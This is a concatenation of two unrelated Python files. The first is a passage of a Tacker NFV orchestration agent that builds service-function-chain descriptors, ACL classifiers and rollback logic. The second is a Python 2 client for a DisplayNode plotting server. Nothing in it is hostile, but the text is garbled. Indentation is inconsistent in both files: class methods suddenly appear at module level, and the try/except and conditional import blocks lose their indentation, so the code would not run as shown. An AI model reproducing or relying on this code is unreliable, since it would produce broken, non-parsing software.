msg = "Router Floating IP interface not configured for network '%s'. %s" % (net_name, e.reason)
logger.error(msg)
raise NFVOAgentsException(ERROR, msg)
return src_port_id
    def select_and_validate_cp_out(self, options_cp_out, vnf_pkg_cps, cp_in):
        """Selects and validates the CP_out based on Tacker NFVO requirements.

        Verify if there is another CP attached to subnet of cp_in. If not, return all CPs with OPTIONS reply.
        If there are more than 1 CP attached to subnet of cp_in, return OPTIONS status and the suitable CPs
        in order to the user select one of them as output CP.
        It also verifies if cp_out has a value. If yes, validate if it is attached to the same net of cp_in.

        OBS: Tacker/Pike does not work yet on SFCs using different subnets.
        Therefore, each SFC must be composed in the same subnet.

        NOTE(review): this method mutates *vnf_pkg_cps* in place (CPs on other
        subnets are removed) — callers should not expect the original contents
        afterwards.

        :param options_cp_out: the output connection point
        :param vnf_pkg_cps: a dict containing the vnf package connection points and its subnet names
        :param cp_in: cp_in connection point name
        :return: CP_out if validated

        Raises
        ------
        :NFVOAgentOptions: if it was not possible to select CP_out automatically
        """
        cp_out = options_cp_out
        # Leave just the CPs that are in the same subnet as CP_in (Tacker/Pike requirement).
        # Snapshot the key list first, since the dict is mutated while iterating.
        cps = vnf_pkg_cps.keys()
        cps = list(cps)
        for cp in cps:
            if vnf_pkg_cps[cp]['network_name'] != vnf_pkg_cps[cp_in]['network_name']:
                vnf_pkg_cps.pop(cp)
        # We are assuming that there are more than 1 CP using a same subnet. So, SFC_Core could not
        # select cp_out automatically, and user must inform a CP_out.
        if not options_cp_out:
            # Case all other CPs are from other subnets, then there is only 1 CP available
            if len(vnf_pkg_cps) == 1:
                cp_out = cp_in
            else:
                # Tacker/Pike does not work with Input and Output CPs belonging to the same subnet
                # return OPTIONS, {
                #     'status': OPTIONS,
                #     'reason': 'Inform the outgoing traffic CP',
                #     'cp_list': vnf_pkg_cps
                # }
                cp_out = cp_in
        else:
            # vnf_pkg_cps holds here only the CPs which share CP_in's subnet.
            if options_cp_out not in vnf_pkg_cps:
                raise NFVOAgentOptions('Invalid CP!', vnf_pkg_cps)
        return cp_out
    def get_available_policies(self):
        """Returns the Tacker classifier ACL.

        Mapping of Tacker ACL classifier match-field name -> human-readable description.
        """
        return {
            'eth_type': 'Specifies Ethernet frame type (See IEEE 802.3)',
            'eth_src': 'Ethernet source address',
            'eth_dst': 'Ethernet destination address',
            'vlan_id': 'VLAN ID',
            'vlan_pcp': 'VLAN Priority',
            'mpls_label': 'MPLS Label',
            'mpls_tc': 'MPLS Traffic Class',
            'ip_dscp': 'IP DSCP (6 bits in ToS field)',
            'ip_ecn': 'IP ECN (2 bits in ToS field)',
            'ip_src_prefix': 'IP source address prefix',
            'ip_dst_prefix': 'IP destination address prefix',
            'ip_proto': 'IP protocol number',
            'tenant_id': 'OpenStack Tenant ID',
            'icmpv4_type': 'ICMP type',
            'icmpv4_code': 'ICMP code',
            'arp_op': 'ARP opcode',
            'arp_spa': 'ARP source ipv4 address',
            'arp_tpa': 'ARP target ipv4 address',
            'arp_sha': 'ARP source hardware address',
            'arp_tha': 'ARP target hardware address',
            'ipv6_src': 'IPv6 source address',
            'ipv6_dst': 'IPv6 destination address',
            'ipv6_flabel': 'IPv6 Flow Label',
            'icmpv6_type': 'ICMPv6 type',
            'icmpv6_code': 'ICMPv6 code',
            'ipv6_nd_target': 'Target address for ND',
            'ipv6_nd_sll': 'Source link-layer for ND',
            'ipv6_nd_tll': 'Target link-layer for ND',
            'destination_port_range': 'Target port range'
        }
def get_sfc_template(self):
    """Return a skeleton Tacker VNFFG Descriptor (VNFFGD).

    The skeleton holds one forwarding path ("Forwarding_path1") with a
    single empty ACL classifier, and one VNFFG group ("VNFFG1") with no
    connection points, VNFs or virtual links yet. compose_sfp() and the
    policy configuration methods fill it in incrementally.

    :return: a dict with the empty VNFFGD structure
    """
    forwarding_path = {
        "type": "tosca.nodes.nfv.FP.TackerV2",
        "description": "creates path (CP12->CP22)",
        "properties": {
            "policy": {
                "type": "ACL",
                "criteria": [
                    {
                        "name": "classifier1",
                        "classifier": {}
                    }
                ]
            },
            "path": [],
            "id": 0
        }
    }
    vnffg_group = {
        "type": "tosca.groups.nfv.VNFFG",
        "description": "HTTP to Corporate Net",
        "members": [
            "Forwarding_path1"
        ],
        "properties": {
            "vendor": "tacker",
            "connection_point": [],
            "version": 1.0,
            "constituent_vnfs": [],
            "number_of_endpoints": 0,
            "dependent_virtual_link": []
        }
    }
    topology_template = {
        "node_templates": {
            "Forwarding_path1": forwarding_path
        },
        "description": "Sample VNFFG template",
        "groups": {
            "VNFFG1": vnffg_group
        }
    }
    return {
        "vnffgd": {
            "name": "vnffgd1",
            "template": {
                "vnffgd": {
                    "tosca_definitions_version": "tosca_simple_profile_for_nfv_1_0_0",
                    "description": "Sample VNFFG template",
                    "topology_template": topology_template
                }
            }
        }
    }
def get_policies(self, sfc_descriptor):
    """Retrieve the ACL classifiers configured in the SFC descriptor.

    :param sfc_descriptor: the VNFFGD being composed
    :return: a list with one classifier dict per configured criterion
    """
    criteria = (sfc_descriptor['vnffgd']['template']['vnffgd']
                ['topology_template']['node_templates']
                ['Forwarding_path1']['properties']['policy']['criteria'])
    return [criterion['classifier'] for criterion in criteria]
def get_sfc_input_security_policy_data(self, sfc_descriptor):
    """Retrieve the data required to configure security policies.

    :param sfc_descriptor: the VNFFGD being composed
    :return: a list of dicts with the IP protocol number and port bounds,
             e.g. [{proto: 6, min_port: 80, max_port: 80}]
    """
    policy_data = []
    for policy in self.get_policies(sfc_descriptor):
        entry = {}
        if 'ip_proto' in policy:
            entry['proto'] = policy['ip_proto']
        if 'destination_port_range' in policy:
            bounds = policy['destination_port_range'].split(sep='-')
            entry['min_port'] = bounds[0]
            entry['max_port'] = bounds[1]
        policy_data.append(entry)
    return policy_data
def list_vnf_pkg_cps(self, vnfp_dir):
    """Retrieve all connection points of a VNF Package stored in repository.

    Parses the package's VNFD and collects every node whose type contains
    ``tosca.nodes.nfv.CP``, together with the virtual link it requires and
    the network name declared on that virtual link node.

    :param vnfp_dir: VNF Package directory name
    :return: a dict mapping CP name -> {'virtual_link': ..., 'network_name': ...}
    """
    vnfd_path = 'repository/%s/vnfd.json' % vnfp_dir
    # json.load parses straight from the file object (replaces the former
    # read() + json.loads round trip)
    with open(vnfd_path) as vnfd_file:
        vnfd_data = json.load(vnfd_file)
    node_templates = vnfd_data['vnfd']['attributes']['vnfd']['topology_template']['node_templates']
    cps = {}
    # items() avoids re-indexing node_templates for every key
    for name, node in node_templates.items():
        if 'tosca.nodes.nfv.CP' in node['type']:
            virtual_link = node['requirements'][0]['virtualLink']['node']
            network_name = node_templates[virtual_link]['properties']['network_name']
            cps[name] = {'virtual_link': virtual_link, 'network_name': network_name}
    return cps
def compose_sfp(self, sfc_descriptor, vnfd_name, vnfp_dir, database, options_cp_out):
    """Performs VNF Chaining in the VNFFG Template.

    This function stands for VNF Chaining and its requirements for CPs and VLs using the VNFFG Template.
    The first interface is reserved for the VNF management interface, and thus it is not used for VNF chaining.
    The following rules are taken into account:

    :cp_in: chooses the cp_in according to the same network of the prior cp_out.
            If the VNF is the first one, then the first CP is chosen (disregarding the management interface)
    :cp_out: if the given VNF has just one CP for VNF chaining, then cp_out = cp_in.
             If cp_out can not be selected automatically, a exception with OPTIONS status is raised
             in order to the user inform the desirable and suitable connection point.

    :param sfc_descriptor: the VNFFG descriptor being composed
    :param vnfd_name:
    :param vnfp_dir:
    :param database:
    :param options_cp_out: not required, but it can be used for manual choosing of cp_out
    :return: the Tacker SFC Descriptor (i.e. VNFFGD) being composed

    Raises
    ------
    NFVOAgentsException

    ReRaises
    ------
    NFVOAgentOptions, DatabaseException
    """
    vnf_pkg_cps = self.list_vnf_pkg_cps(vnfp_dir)
    topology_template = sfc_descriptor['vnffgd']['template']['vnffgd']['topology_template']
    # verifying if this vnf package was already added to this VNFFG (no duplication allowed)
    if vnfd_name in topology_template['groups']['VNFFG1']['properties']['constituent_vnfs']:
        raise NFVOAgentsException(ERROR, 'The selected VNF Package was already added in this SFC!')
    cp_list = sorted(vnf_pkg_cps)
    # we are considering that the Tacker's first CP is always reserved for the VNF management interface
    # Thus, it is not used for VNF chaining
    cp_list.pop(0)
    # gets all virtual links in VNFFGD
    vnffgd_vls = topology_template['groups']['VNFFG1']['properties']['dependent_virtual_link']
    # getting the previous network_name for correct VNF chaining
    previous_net_name = ''
    if vnffgd_vls:
        previous_vl = vnffgd_vls[-1]  # gets the current last VL in VNFFG
        # gets the current last VNF Name in VNFFGD
        previous_vnfd_name = topology_template['groups']['VNFFG1']['properties']['constituent_vnfs'][-1]
        previous_vnf_pkg = database.list_catalog(vnfd_name=previous_vnfd_name)
        previous_vnfp_dir = previous_vnf_pkg[0]['dir_id']
        # gets all connection points data from previous VNFD
        previous_vnfd_cps = self.list_vnf_pkg_cps(previous_vnfp_dir)
        # the previous VNF's output network is the one its last VL is attached to
        for cp in previous_vnfd_cps:
            if previous_vnfd_cps[cp]['virtual_link'] == previous_vl:
                previous_net_name = previous_vnfd_cps[cp]['network_name']
                break
    cp_in, cp_out = "", ""
    # including cp_input
    for cp in cp_list:
        if vnffgd_vls:  # if there are previous Virtual Links included in VNFFGD
            # cp_in is valid just if it is connected to the same network_name from previous VNF output
            if vnf_pkg_cps[cp]['network_name'] == previous_net_name:
                cp_in = cp
                break
        else:  # if this VNF is the first one being included in VNFFGD
            cp_in = cp
            break
    if not cp_in:
        raise NFVOAgentsException(ERROR, 'There is no suitable CP for chaining with the previous VNF!')
    # including cp_output
    num_cps = len(cp_list)
    if num_cps == 1:
        cp_out = cp_in
    else:  # num_cps surely will be > 1, because previous return
        # output CP requirements are dependent of NFVO capabilities, thus it was implemented in the related agent
        cp_out = self.select_and_validate_cp_out(options_cp_out, vnf_pkg_cps, cp_in)
    # a single capability entry when input and output share the same CP
    if cp_in == cp_out:
        capability = [cp_in]
    else:
        capability = [cp_in, cp_out]
    for cp in capability:
        # including connection points
        topology_template['groups']['VNFFG1']['properties']['connection_point'].append(cp)
        # including dependent virtual links
        virtual_link = vnf_pkg_cps[cp]['virtual_link']
        # if virtual_link not in topology_template['groups']['VNFFG1']['properties']['dependent_virtual_link']:
        topology_template['groups']['VNFFG1']['properties']['dependent_virtual_link'].append(virtual_link)
    # including constituent VNFs
    topology_template['groups']['VNFFG1']['properties']['constituent_vnfs'].append(vnfd_name)
    vnf_end_points = len(capability)
    if vnf_end_points == 1:
        capability = capability[0]
    else:
        # Tacker expects multiple capabilities as a comma-separated string
        capability = ','.join(capability)
    # including number of endpoints
    topology_template['groups']['VNFFG1']['properties']['number_of_endpoints'] += vnf_end_points
    # TODO we disabled sfc_encap since our VNFs are NSH-unaware (i.e. VNFs are receiving MPLS packets from OVS)
    # As a result we are only creating SFCs using NSH-unaware VNFs. NSH-aware VNFs still need to be implemented
    path = {"forwarder": vnfd_name,
            "capability": capability,
            "sfc_encap": False}  # hard coded
    # including VNF forwarding path
    topology_template['node_templates']['Forwarding_path1']['properties']['path'].append(path)
    return sfc_descriptor
def get_vnf_nfvo_resource_id(self, vnf_id, resource_name):
    """Retrieve the NFVO resource ID (such as VDU or CP) of a given VNF.

    :param vnf_id: the NFVO VNF identifier
    :param resource_name: the resource name to get the ID

    Raises
    ------
    NFVOAgentsException
    """
    resources = self.list_vnf_nfvo_resources(vnf_id)
    matching_ids = [res['id'] for res in resources if res['name'] == resource_name]
    if matching_ids:
        return matching_ids[0]
    raise NFVOAgentsException(ERROR, 'VNF Resource ID not found!')
def get_sfc_traffic_origin(self, core):
    """Return the traffic-origin field metadata and candidate source VNFs.

    :param core: not referenced here; kept for interface compatibility
    :return: a (fields, src_vnfs) tuple — *fields* tells client
             applications which columns to render, *src_vnfs* lists the
             VNFs usable as SFC traffic origin
    """
    # fields defines which information should be shown dynamically by client applications
    fields = [
        {'id': 'ID'},
        {'name': 'Name'},
        {'instance': 'Instance Name'},
        {'address': 'Mgmt Address'},
        {'status': 'Status'},
        {'platform': 'Platform'}
    ]
    src_vnfs = [
        {
            'id': vnf.get('vnf_id'),
            'name': vnf.get('vnf_name'),
            'instance': vnf.get('instance_name'),
            'address': vnf.get('mgmt_url'),
            'status': vnf.get('vnf_status'),
            'platform': TACKER_NFVO
        }
        for vnf in self.list_vnfs()
    ]
    return fields, src_vnfs
def configure_traffic_src_policy(self, sfc_descriptor, origin, src_id, cp_out, database):
    """
    Includes ACL criteria according to INTERNAL or EXTERNAL traffic source

    INTERNAL traffic is sourced from VNFs managed by NFVO, while EXTERNAL traffic is sourced from everything
    out from NFVO networks.
    This function also includes specific requirements to select the source port for Tacker.
    Tacker has the requirement for 'network_source_port_id' in ACL criteria, which is included in VNFFGD
    by this function.

    One important rule is applied:
    1. Tacker's network_name from the origin VNF CP must be the same as the input CP of the first VNF in the chain.
       If there are more CPs than 1, then a message with status OPTIONS and a cp_list is replied to the
       user to inform a desirable connection point.

    :param sfc_descriptor:
    :param origin: INTERNAL or EXTERNAL as in *utils module*
    :param src_id: the Tacker's VNF ID of the VNF which generates the SFC incoming traffic
    :param cp_out:
    :param database:
    :return: the VNFFGD being composed

    Raises
    ------
    NFVOAgentsException, NFVOAgentOptions

    ReRaises
    ------
    DatabaseException
    """
    net_src_port_id = None
    topology_template = sfc_descriptor['vnffgd']['template']['vnffgd']['topology_template']
    # sfp = service function path
    sfp_cps = topology_template['groups']['VNFFG1']['properties']['connection_point']
    sfp_vnfs = topology_template['groups']['VNFFG1']['properties']['constituent_vnfs']
    # network_src_port_id is a requirement for Tacker NFVO
    criteria = topology_template['node_templates']['Forwarding_path1']['properties']['policy']['criteria']
    catalog = database.list_catalog(vnfd_name=sfp_vnfs[0])
    sfp_first_pkg_dir_id = catalog[0]['dir_id']
    # CPs of the first VNF in the chain; sfp_cps[0] is its input CP
    sfp_first_vnf_cps = self.list_vnf_pkg_cps(sfp_first_pkg_dir_id)
    if origin == INTERNAL:
        data = database.list_vnf_instances(vnf_id=src_id)
        # Only VNFs instantiated by this framework can be used as origin,
        # as we need get information of its CP on VNF Packages
        if not data:
            raise NFVOAgentsException(ERROR, 'The chosen VNF was not instantiated by this framework!')
        vnf_pkg_id = data[0]['vnf_pkg_id']
        catalog = database.list_catalog(vnf_pkg_id=vnf_pkg_id)
        vnf_pkg_dir = catalog[0]['dir_id']
        vnf_pkg_cps = self.list_vnf_pkg_cps(vnf_pkg_dir)
        # Leave just the CPs that are in the same subnet of the first VNF CP_in of the SFC
        cps = vnf_pkg_cps.keys()
        # materialize the key view so entries can be popped while iterating
        cps = list(cps)
        for cp in cps:
            if vnf_pkg_cps[cp]['network_name'] != sfp_first_vnf_cps[sfp_cps[0]]['network_name']:
                vnf_pkg_cps.pop(cp)
        if cp_out is None:
            # Selects the suitable CP_out automatically
            if not vnf_pkg_cps:
                raise NFVOAgentsException(ERROR, 'No suitable CP on this VNF!')
            if len(vnf_pkg_cps) == 1:
                cp_name = list(vnf_pkg_cps.keys())[0]
            else:
                # more than one candidate: user must pick one (OPTIONS flow)
                raise NFVOAgentOptions('Choose an CP!', vnf_pkg_cps)
        else:
            cp_name = cp_out
            if cp_name not in vnf_pkg_cps:
                raise NFVOAgentsException(ERROR, 'Invalid CP!')
        net_src_port_id = self.get_vnf_nfvo_resource_id(src_id, cp_name)
    elif origin == EXTERNAL:
        # external traffic enters via the router interface of the first VNF's input network
        net_src_port_id = self.get_fip_router_interface_id(sfp_first_vnf_cps[sfp_cps[0]]['network_name'])
    else:
        raise NFVOAgentsException(ERROR, 'SFC network traffic should be INTERNAL or EXTERNAL.')
    if not net_src_port_id:
        logger.error('Unable to get a value for network_src_port_id')
        raise NFVOAgentsException(ERROR, 'Unable to get the source port id to configure the SFC classifier')
    # currently multi-sfc uses only one network_src_port_id for all classifiers (the same)
    # the configure_policies gets this value and uses for all subsequent classifiers
    for classifier in criteria:
        classifier['classifier']['network_src_port_id'] = net_src_port_id
    return sfc_descriptor
def acl_criteria_parser(self, acl):
    """Parse all ACL criteria according to the Tacker NFVO requirements.

    Validates each criterion name against the aclType definition in
    ``tacker_nfv_defs.yaml``, enforces the declared ``in_range``
    constraints, and converts integer-typed values from str to int.

    :param acl: a dict with the acl criteria
    :return: a dict with the parsed acl criteria

    Raises
    ------
    NFVOAgentsException
    """
    with open('tacker_nfv_defs.yaml', 'r') as defs_file:
        acl_defs = yaml.full_load(defs_file.read())
    acl_types = acl_defs['data_types']['tosca.nfv.datatypes.aclType']['properties']
    # iterate over a copy, since integer values are rewritten in place
    for criterion, value in acl.copy().items():
        if criterion not in acl_types:
            msg = 'Invalid ACL criteria "%s"!' % criterion
            logger.error(msg)
            raise NFVOAgentsException(ERROR, msg)
        spec = acl_types[criterion]
        if 'constraints' in spec:
            start, end = spec['constraints'][0]['in_range']
            if int(value) not in range(start, end + 1):
                msg = "Invalid value for ACL criteria '%s'! Use a value between %s and %s." % (criterion, start, end)
                logger.error(msg)
                raise NFVOAgentsException(ERROR, msg)
        if spec['type'] == 'integer':
            acl[criterion] = int(value)
    return acl
def configure_policies(self, sfc_descriptor, policies):
    """Configure ACL rules for all Tacker SFC classifiers.

    Replaces the current criteria list with one classifier per policy,
    propagating the network_src_port_id previously stored on the first
    classifier to every new one.

    :param sfc_descriptor: the VNFFGD being composed
    :param policies: a list of ACL dicts, one per classifier
    :return: the VNFFGD with all classifiers configured
    """
    topology_template = sfc_descriptor['vnffgd']['template']['vnffgd']['topology_template']
    criteria = topology_template['node_templates']['Forwarding_path1']['properties']['policy']['criteria']
    # keep the source port id captured by configure_traffic_src_policy
    net_src_port_id = criteria[0]['classifier'].get('network_src_port_id')
    # drop the partial first classifier and rebuild the whole list in one shot
    criteria.clear()
    for acl in policies:  # acl is the content of a policy
        parsed_acl = self.acl_criteria_parser(acl)
        parsed_acl['network_src_port_id'] = net_src_port_id
        # classifier unique name is configured in create_sfc, where the SFC name is known
        criteria.append({"classifier": parsed_acl})
    return sfc_descriptor
def set_next_vnffgd_path_id(self, vnffgd):
    """Set up the next VNFFGD SFP id in the SFC being composed.

    Retrieves the largest SFP ID from the NFVO's vnffgd catalog and sets
    that value + 1 in the vnffgd currently being composed.

    :param vnffgd: the vnffgd being composed
    :return: the vnffgd being composed

    ReRaises
    ------
    NFVOAgentsException
    """
    path_ids = [
        item['template']['vnffgd']['topology_template']
            ['node_templates']['Forwarding_path1']['properties']['id']
        for item in self.list_vnffgds()
    ]
    # builtin max replaces the manual running-maximum loop; the seeded 0
    # reproduces the previous behavior for an empty catalog
    last_path_id = max([0] + path_ids)
    vnffgd['vnffgd']['template']['vnffgd']['topology_template'][
        'node_templates']['Forwarding_path1']['properties']['id'] = last_path_id + 1
    return vnffgd
def destroy_sfc_actions(self, destroy_vnf_fn, vnf_instance_ids=None, vnffgd_id=None, vnffg_id=None):
    """Executes the required actions do destroy an SFC.

    This function can be employed on a regular workflow to destroy SFCs, and on rollback actions due to
    errors while creating an SFC.

    :param destroy_vnf_fn: callback function from the core module
    :param vnf_instance_ids: a list of vnf instance ids to destroy, only required if vnffg_id is None
    :param vnffgd_id: the vnffg descriptor id to remove, only required if vnffg_id is None
    :param vnffg_id: the vnffg id to remove, if any

    Raises
    ------
    NFVOAgentsException

    ReRaises
    ------
    NFVOAgentsException
    """
    vnffg_vnfs = []  # list of vnf ids to destroy
    if vnffg_id:
        # regular workflow: resolve the VNFFGD and member VNFs from the live VNFFG
        data = self.show_vnffg(vnffg_id)
        vnffgd_id = data['vnffgd_id']
        vnf_mapping = data['vnf_mapping']
        for vnf_id in vnf_mapping.values():
            vnffg_vnfs.append(vnf_id)
        # destroying VNFFG
        self.destroy_vnffg(vnffg_id)
        # How many time should we wait before remove the VNFFGD?
        time.sleep(2)
    # destroying VNFFGD
    if vnffgd_id:  # we need to check since rollback action might not have passed this argument
        self.delete_vnffgd(vnffgd_id)
    if vnf_instance_ids and not vnffg_vnfs:  # we only use value of vnf_instance_ids on rollback actions
        vnffg_vnfs = vnf_instance_ids
    # destroying all VNFs and VNFDs using threads, I/O bound, no GLI problem
    workers = []
    queue = Queue()  # queue to get return values from threads
    for vnf_id in vnffg_vnfs:
        t = Thread(target=destroy_vnf_fn, args=(vnf_id, queue))
        t.start()
        workers.append(t)
    for w in workers:  # waiting all threads to finish
        w.join()
    logger.debug('Returned data from threads: %s', list(queue.queue))
    # accumulate the failure reasons (if any) reported by the worker threads
    message = ''
    while not queue.empty():
        vnf_data = queue.get()
        if vnf_data['status'] != OK:
            message = ''.join([message, vnf_data['reason'], ' '])
        queue.task_done()
    # Threads to destroy VNFs up to here!!!
    if message:
        raise NFVOAgentsException(ERROR, message)
def create_sfc(self, sfc_descriptor, database, sfc_uuid, sfc_name, create_vnf_fn, destroy_vnf_fn):
    """Sends and instantiates all VNFDs and VNFFGDs to the Tacker NFVO.

    If an error occurs it also calls rollback actions.

    :param sfc_descriptor: the VNFFGD to be instantiated
    :param database:
    :param sfc_uuid: the unique identifier of the composed SFC to be started
    :param sfc_name: the name of the SFC being instantiated (optional)
    :param create_vnf_fn: callback function from the core module
    :param destroy_vnf_fn: callback function from the core module
    :return: a dict containing:
        - a list of *vnf_instances* of the created SFC
        - the created *vnffgd_id*
        - the created *vnffg_id*

    Raises
    ------
    NFVOAgentsException

    ReRaises
    ------
    NFVOAgentsException, DatabaseException
    """
    vnffgd_list = self.list_vnffgds()
    vnffg_list = self.vnffg_list()
    vnffgds = [x for x in vnffgd_list if x['name'] == sfc_name]
    vnffgs = [x for x in vnffg_list if x['name'] == sfc_name]
    if vnffgds or vnffgs:
        raise NFVOAgentsException(ERROR, "SFC name '%s' already exists" % sfc_name)
    vnf_instance_list = []
    vnf_mapping = {}
    topology_template = sfc_descriptor['vnffgd']['template']['vnffgd']['topology_template']
    constituent_vnfs = topology_template['groups']['VNFFG1']['properties']['constituent_vnfs']
    # configuring VNFFGD unique name
    sfc_descriptor['vnffgd']['name'] = sfc_name
    # configuring classifiers human readable unique names
    criteria = topology_template['node_templates']['Forwarding_path1']['properties']['policy']['criteria']
    for index, classifier in enumerate(criteria, start=1):
        classifier['name'] = sfc_name + '-classifier{}'.format(index)
    # Instantiating all VNFDs in VNFFGD using threads, I/O bound, no GIL problem
    workers = []
    queue = Queue()  # queue to get return values from threads
    pkgs = []  # packages to be instantiated
    for vnfd_name in constituent_vnfs:
        data = database.list_catalog(vnfd_name=vnfd_name)
        pkgs.append({
            'vnfp_id': data[0]['_id'],
            'domain_id': self.domain_id,
            'nfvo_id': self.nfvo_id
        })
    for pkg in pkgs:
        t = Thread(target=create_vnf_fn, args=(pkg, queue))
        t.start()
        workers.append(t)
    for w in workers:  # waiting all threads to finish
        w.join()
    logger.debug('Returned data from threads: %s', list(queue.queue))
    error = False
    while not queue.empty():
        vnf_data = queue.get()
        if vnf_data['status'] == OK:
            vnf_mapping[vnf_data['vnfd_name']] = vnf_data['vnf_id']
        else:
            logger.error("VNF could not be instantiated. Reason: %s", vnf_data['reason'])
            error = True
        queue.task_done()
    # Threads to instantiate VNFs up to here!!!
    # Rollback action if a given VNF fails on instantiating.
    # BUGFIX: roll back *before* building the ordered instance list below.
    # Previously, the ordering loop ran first and raised an unhandled
    # KeyError on the missing vnf_mapping entry of the failed VNF,
    # skipping the rollback entirely.
    if error:
        logger.info("Executing rollback actions...")
        self.destroy_sfc_actions(destroy_vnf_fn, list(vnf_mapping.values()))
        logger.info('Rollback done!')
        raise NFVOAgentsException(ERROR, 'Something went wrong on instantiating VNFs. See server logs.')
    # VNF instance list needs to be ordered according to the VNFFGD to avoid errors on instantiating tunnels
    # This is required because this version of Tacker agent instantiates VNFFGs using threads instead of
    # using a single call to create a NS from a NSD
    for vnfd_name in constituent_vnfs:
        vnf_instance_list.append(vnf_mapping[vnfd_name])
    vnffgd_id = None
    try:
        # incrementing SFP path_id number in VNFFGD
        # Consider put the set_next_vnffgd_path_id() in a CRITICAL REGION to avoid condition racing
        sfc_descriptor = self.set_next_vnffgd_path_id(sfc_descriptor)
        # show the ultimate created VNFFGD
        logger.info('SFC Template UUID: %s\n%s', sfc_uuid,
                    self.dump_sfc_descriptor(sfc_descriptor))
        # create VNFFGD in NFVO
        vnffgd_id = self.create_vnffgd(sfc_descriptor)
        # Critical Region up to here
        logger.info("SFC descriptor created with id %s", vnffgd_id)
        # instantiate VNFFG
        vnffg_id = self.create_vnffg(vnffgd_id, vnf_mapping, sfc_name)
    # Rollback actions
    except NFVOAgentsException as e:
        logger.error('Unable to instantiate SFC: %s', e.reason)
        try:
            logger.info("Executing rollback actions...")
            self.destroy_sfc_actions(destroy_vnf_fn, vnf_instance_list, vnffgd_id)
            logger.info('Rollback done!')
        except NFVOAgentsException as ex:
            logger.error('Unable to execute rollback actions: %s', ex.reason)
            message = ' '.join([e.reason, 'Rollback:', ex.reason])
            raise NFVOAgentsException(ERROR, message)
        raise
    return {
        'vnf_instances': vnf_instance_list,
        'nsd_id': vnffgd_id,
        'ns_id': vnffg_id
    }
def destroy_sfc(self, sfc_id, destroy_vnf_fn):
    """Destroy the VNFFG and its VNFs.

    Removes the VNFFG and its VNFFGD, and also destroys all the VNFs and
    VNFDs specified in that VNFFG.

    :param sfc_id: the NFVO unique identifier of the VNFFG
    :param destroy_vnf_fn: callback function from the core module

    Raises / ReRaises
    ------
    NFVOAgentsException
    """
    try:
        self.destroy_sfc_actions(destroy_vnf_fn, vnffg_id=sfc_id)
    except NFVOAgentsException as err:
        logger.error('Unable to destroy SFC %s, reason: %s', sfc_id, err.reason)
        raise
def dump_sfc_descriptor(self, sfc_descriptor):
    """Serialize the SFC descriptor as pretty-printed JSON (sorted keys)."""
    pretty = json.dumps(sfc_descriptor, indent=2, sort_keys=True)
    return pretty
|
DisplayNodeProxy.py |
# Display Node - Python and Javascript plotting and data visualisation.
# Stefano Pedemonte
# Aalto University, School of Science, Helsinki
# 20 Oct 2013, Helsinki
from DisplayNodeServer import DisplayNodeServer
from DisplayNodeServer import PROXY_ADDRESS,PROXY_PORT,WEB_ADDRESS,WEB_PORT
from xmlrpclib import Server, Binary
import webbrowser
import sys
import socket
from StringIO import StringIO
from PIL import Image
try:
import Image as IM
except:
IM=Image
import platform
#if platform.system() == "Linux":
if 0:
from multiprocessing import Process
import signal
USE_MULTIPROCESSING = True
else:
import thread
USE_MULTIPROCESSING = False
WIDTH = '900' #'900' #FIXME: obtain display specific width and height form the server
HEIGHT = '450'
socket.setdefaulttimeout(60)
class ParameterError(Exception):
    """Raised when display() receives data of an unexpected type."""
    def __init__(self, msg):
        self.msg = str(msg)

    def __str__(self):
        return "Unexpected parameter: %s" % (self.msg)
def is_an_image(im):
    """Return True if *im* is a PIL image under either module binding."""
    return isinstance(im, (Image.Image, IM.Image))
class DisplayNode():
    # Client-side proxy to a DisplayNodeServer instance. Starts the server
    # (in a child process or a background thread, depending on
    # USE_MULTIPROCESSING) when none is responding, then forwards display
    # requests to it over XML-RPC.
    def __init__(self,proxy_address=(PROXY_ADDRESS,PROXY_PORT), web_address=(WEB_ADDRESS,WEB_PORT)):
        self._proxy = Server('http://%s:%s'%proxy_address,allow_none=True)
        # print "Proxy: ",proxy_address
        self.start_server(proxy_address,web_address)
        self.data = None    # last payload sent to the server
        self.type = None    # last content type ('image', 'tipix', ...)
        self.url = None     # URL of the last rendered page
        self.width = 0      # iframe width used by _repr_html_
        self.height = 0     # iframe height used by _repr_html_
        # FIXME: use introspection to define the methods (for autocompletion)
    def start_server(self,proxy_address,web_address):
        # Launch a DisplayNodeServer only if no server already answers at
        # the proxy address.
        if not self.is_server_responding():
            self._server = DisplayNodeServer(proxy_address,web_address)
            if USE_MULTIPROCESSING:
                #print "Multiprocessing version! "
                self._server_process = Process( target=self.__run_server_forever, args=() )
                self._server_process.start()
            else:
                thread.start_new_thread( self.__run_server_forever, () )
    def __run_server_forever(self):
        # Server loop body; runs in the child process or background thread.
        if USE_MULTIPROCESSING:
            signal.signal(signal.SIGINT, self.__signal_handler_interrupt)
        self._server.serve_forever()
    def __signal_handler_interrupt(self, signal, frame):
        # SIGINT handler; installed only in the multiprocessing variant.
        print 'Shutting down DisplayNode server. '
        sys.exit(0)
    def is_server_responding(self):
        # Probe the XML-RPC server with a short 2 s timeout, then restore
        # the module's default 60 s socket timeout.
        socket.setdefaulttimeout(2)
        try:
            alive = self._proxy.is_alive(1)
        except:
            alive = False
        socket.setdefaulttimeout(60)
        return alive
    def display(self,content_type,data={},open_browser=False,new_tab=True,autoraise=False):
        # Render *data* remotely and remember the resulting URL.
        # NOTE(review): the mutable default `data={}` is shared across calls;
        # safe only while callers never mutate the default — confirm.
        # if image: send png content
        if content_type=="image":
            buf = StringIO()
            data.convert("RGB").save(buf,format="png")
            data = Binary(buf.getvalue())
            buf.close()
        # if list of images: send list of png content
        if content_type=="tipix":
            if not type(data)==list:
                raise ParameterError("Parameter for 'tipix' must be a list of images.")
            # 1D array of images:
            if is_an_image(data[0]):
                for i in range(len(data)):
                    if not is_an_image(data[i]):
                        raise ParameterError("Parameter for 'tipix' must be a list of images.")
                    # encode each image as PNG bytes wrapped for XML-RPC
                    buf = StringIO()
                    data[i].convert("RGB").save(buf,format="png")
                    data[i] = Binary(buf.getvalue())
                    buf.close()
            # 2D array of images:
            elif type(data[0])==list:
                for i in range(len(data)):
                    for j in range(len(data[i])):
                        if not is_an_image(data[i][j]):
                            raise ParameterError("Parameter for 'tipix' must be a list of images.")
                        buf = StringIO()
                        data[i][j].convert("RGB").save(buf,format="png")
                        data[i][j] = Binary(buf.getvalue())
                        buf.close()
        url = self._proxy.display({'type':content_type,'data':data})
        if open_browser:
            if new_tab:
                webbrowser.open_new_tab(url)
            else:
                webbrowser.open(url,autoraise=autoraise)
        self.data = data
        self.type = content_type
        self.url = url
        self.width = WIDTH #FIXME: obtain width and height from the server
